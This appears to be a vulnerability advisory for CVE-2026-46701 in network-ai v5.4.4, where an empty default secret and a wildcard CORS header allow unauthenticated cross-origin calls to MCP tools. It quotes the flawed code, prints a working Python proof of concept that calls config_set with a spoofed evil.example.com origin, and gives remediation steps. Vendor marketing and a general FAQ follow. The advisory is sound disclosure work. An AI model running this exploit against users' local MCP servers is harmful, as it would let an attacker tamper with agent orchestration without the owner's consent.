CVE-2026-46701 — network-ai
Origin Validation ErrorUnauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret
| Field | Value | | ---------------- | ----- | | Repository | Jovancoding/Network-AI | | Affected version | v5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac) |
Summary
The MCP SSE server defaults to an empty secret (process.env['NETWORK_AI_MCP_SECRET'] ?? '' at bin/mcp-server.ts:89), which causes _isAuthorized (lib/mcp-transport-sse.ts:254) to return true unconditionally for every request — no Authorization header is required. Simultaneously, _handleRequest sets Access-Control-Allow-Origin: * (lib/mcp-transport-sse.ts:272) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools — including config_set, agent_spawn, and blackboard_write — against a default-configured localhost server.
Affected Code
bin/mcp-server.ts:89 — default secret resolves to empty string, enabling open access
secret: process.env['NETWORK_AI_MCP_SECRET'] ?? '',
lib/mcp-transport-sse.ts:254 — auth guard short-circuits to true when secret is falsy
private _isAuthorized(req: http.IncomingMessage): boolean {
if (!this._opts.secret) return true;
const authHeader = req.headers['authorization'];
if (typeof authHeader !== 'string') return false;
const parts = authHeader.split(' ');
return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this._opts.secret;
}
lib/mcp-transport-sse.ts:272 — wildcard CORS header applied unconditionally before any auth check
private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {
// CORS — allow any MCP client to connect
res.setHeader('Access-Control-Allow-Origin', '*');
res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
lib/mcp-transport-sse.ts:367-368 — authenticated path dispatches parsed JSON-RPC frame directly to handleRPC with no further caller validation
const rpc = JSON.parse(body) as McpJsonRpcRequest;
const response = await this._bridge.handleRPC(rpc);
Any cross-origin browser request reaches handleRPC because _isAuthorized returns true (empty secret) and the Access-Control-Allow-Origin: * header lets the browser expose the response to the calling script.
Proof of Concept
Environment
- Network-AI v5.4.4 (latest)
- Docker container bound to
127.0.0.1:3001 - Python 3 +
requests
poc.py
import sys
import requests
BASE = "http://127.0.0.1:3001"
# Step 1: Verify CORS wildcard (simulating cross-origin preflight)
preflight = requests.options(
f"{BASE}/mcp",
headers={
"Origin": "http://evil.example.com",
"Access-Control-Request-Method": "POST",
"Access-Control-Request-Headers": "Content-Type",
},
)
acao = preflight.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] OPTIONS /mcp -> {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}")
if acao != "*":
print(f"RESULT: FAIL — expected ACAO='*', got {acao!r}")
sys.exit(1)
# Step 2: Invoke config_set with NO Authorization header from cross-origin
rpc_payload = {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "config_set",
"arguments": {
"key": "maxParallelAgents",
"value": "999"
}
}
}
resp = requests.post(
f"{BASE}/mcp",
json=rpc_payload,
headers={
"Content-Type": "application/json",
"Origin": "http://evil.example.com",
# No Authorization header — exploiting empty-secret bypass
},
)
print(f"[*] POST /mcp (no auth, cross-origin) -> {resp.status_code}")
print(f"[*] Response body: {resp.text[:800]}")
resp_acao = resp.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] Response Access-Control-Allow-Origin: {resp_acao!r}")
if resp.status_code != 200:
print(f"RESULT: FAIL — expected 200, got {resp.status_code}")
sys.exit(1)
body = resp.json()
result_content = body.get("result", {})
is_error = result_content.get("isError", True)
if is_error:
print(f"RESULT: FAIL — tool returned isError=true: {result_content}")
sys.exit(1)
# Step 3: Confirm CORS header on actual response (browser can read it)
if resp_acao != "*":
print(f"RESULT: FAIL — response ACAO not '*', browser would block read: {resp_acao!r}")
sys.exit(1)
print(f"RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)")
Output
[*] OPTIONS /mcp -> 204, Access-Control-Allow-Origin: '*'
[*] POST /mcp (no auth, cross-origin) -> 200
[*] Response body: {"jsonrpc":"2.0","id":1,"result":{"content":[{"type":"text","text":"{\"ok\":true,\"tool\":\"config_set\",\"data\":{\"key\":\"maxParallelAgents\",\"previous\":null,\"current\":999,\"applied\":true}}"}],"isError":false}}
[*] Response Access-Control-Allow-Origin: '*'
RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)
Verified conditions
OPTIONS /mcp→ 204,Access-Control-Allow-Origin: *— browser preflight accepted by serverPOST /mcp(no Authorization header) → 200,isError: false—config_setexecuted without credentials- Response
Access-Control-Allow-Origin: *— response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page
Impact
Any web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (config_set); the same vector applies to agent_spawn (spawning arbitrary agents), blackboard_write / blackboard_delete (corrupting shared agent state), and token_create / token_revoke (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).
Remediation
- Require a non-empty secret at startup: in
bin/mcp-server.ts, reject launch whenargs.secretis empty and--stdiois not set:if (!args.secret && !args.stdio) { console.error('ERROR: --secret <token> or NETWORK_AI_MCP_SECRET must be set for SSE mode.'); process.exit(1); } - Restrict CORS to localhost origins only: in
lib/mcp-transport-sse.ts:_handleRequest, replace the wildcard with an allowlist:const origin = req.headers['origin'] ?? ''; const allowed = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin); res.setHeader('Access-Control-Allow-Origin', allowed ? origin : ''); res.setHeader('Vary', 'Origin'); - Move CORS headers after the auth check so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (
/sse) if cross-origin streaming is needed and not on/mcp.
| Software | From | Fixed in |
|---|---|---|
network-ai
|
- | 5.4.5 |
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime
Frequently Asked Questions
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.